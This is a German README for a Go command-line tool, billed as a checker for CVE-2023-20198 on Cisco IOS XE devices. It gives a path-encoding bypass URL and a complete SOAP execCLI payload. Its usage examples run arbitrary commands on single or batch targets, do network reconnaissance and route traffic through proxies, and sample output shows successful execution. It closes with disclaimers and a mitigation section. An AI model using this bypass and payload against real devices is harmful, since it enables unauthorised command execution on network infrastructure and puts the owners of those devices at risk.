
Go-basierter Schwachstellenscanner zur Erkennung von CVE-2023-20198 in Cisco IOS XE-Geräten. Testet SOAP/XML-Schnittstellen (WSMA) auf Remote-Code-Ausführung mit Batch-Scanning und HTML-Berichterstellung.
Ein professioneller Vulnerability-Scanner zur Erkennung von CVE-2023-20198 auf Cisco IOS XE-Geräten. Testet auf anfällige SOAP/XML-Schnittstellen (WSMA). Entwickelt für autorisierte Sicherheitsbewertungen und Netzwerkaudits.
NUR FÜR AUTORISIERTE SICHERHEITSTESTS
Dieses Tool ist ausschließlich bestimmt für:
Unbefugter Zugriff auf Computersysteme ist ILLEGAL. Stellen Sie immer sicher, dass Sie die entsprechende Autorisierung haben, bevor Sie Systeme testen.
go install (empfohlen)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
Die Binärdatei wird in Ihr $GOPATH/bin-Verzeichnis installiert (normalerweise ~/go/bin).
# Repository klonen
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# Bauen
go build -o cisco-cve-2023-20198-checker
# Installieren (optional)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# Einzelnes Ziel prüfen
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Mehrere Ziele prüfen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# HTML-Bericht generieren
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
Perfekt für Unternehmensumgebungen! Unterstützt:
# HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Umgebungsvariable
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
Siehe PROXY_GUIDE.md für eine detaillierte Proxy-Konfiguration.
# Grundlegende Schwachstellenprüfung
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Benutzerdefinierter Port
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# Bestimmten Befehl ausführen
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Bericht generieren
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# Zieldatei erstellen
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# Alle Ziele testen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# Batch mit HTML-Bericht
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# Netzwerkerkundung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# Versionserkennung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Über HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# Über SOCKS5-Proxy (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Authentifizierter Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE-ID: CVE-2023-20198
CVSS-Score: 10.0 (Kritisch)
Typ: Remote Code Execution (RCE)
Betroffen: Cisco IOS XE Web UI (WSMA)
/%2577ebui_wsma_https (Pfadcodierungs-Bypass)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
Wenn Ihre Geräte angreifbar sind:
1. WSMA deaktivieren (falls nicht benötigt)
no ip http server
no ip http secure-server
2. Zugriff mit ACLs einschränken
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. Firmware aktualisieren – Aktuelle Cisco-Sicherheitspatches einspielen
4. Starke Authentifizierung aktivieren
aaa new-model
aaa authentication login default group tacacs+ local
5. Protokolle überwachen – Auf verdächtige SOAP/HTTP-Aktivitäten achten
# Standard-Build
go build -o cisco-cve-2023-20198-checker
# Optimiert (kleinere Binärdatei)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# Für verschiedene Plattformen cross-kompilieren
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ Cisco SOAP/XML Security Checker ║
║ Nur für Bildungs- und autorisierte Sicherheitsaudits ║
╚═══════════════════════════════════════════════════════════╝
[*] Befehl: show version
[*] Port: 443
[*] Timeout: 10 Sekunden
[1/1] Teste Ziel: 192.168.1.100:443
[*] Sende SOAP-Anfrage...
[+] Antwort empfangen (Status: 200)
[+] Erfolg!
╔═══════════════════════════════════════════════════════════╗
║ BATCH-ERGEBNISSE ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - ERFOLG
Cisco IOS XE Software, Version 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ ZUSAMMENFASSUNG ║
╚═══════════════════════════════════════════════════════════╝
Gesamte Ziele: 1
Erfolgreich: 1
Fehlgeschlagen: 0
Professioneller Sicherheitsbewertungsbericht mit:
Beiträge sind willkommen! Bitte:
MIT-Lizenz – siehe LICENSE-Datei
Dieses Tool ist nur für autorisierte Schwachstellenscans bestimmt. Die Autoren sind nicht für Missbrauch verantwortlich. Holen Sie immer eine schriftliche Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören.
Erstellt für die Sicherheits-Community 🛡️
| Flag | Typ | Standard | Beschreibung |
|---|
-target | string | - | Einzelnes Ziel-IP/Rechnername |
-targets-file | string | - | Datei mit Zielen (eines pro Zeile) |
-port | int | 443 | HTTPS/SOAP-Port |
-username | string | admin | SOAP-Benutzername |
-password | string | - | Erforderlich. SOAP-Passwort |
-command | string | uname -a | Auszuführender Befehl |
-html | bool | false | HTML-Bericht generieren |
-timeout | int | 10 | Request-Timeout (Sekunden) |
-skip-verify | bool | true | SSL-Überprüfung überspringen |
-proxy | string | - | Proxy-URL (http://, https://, socks5://) |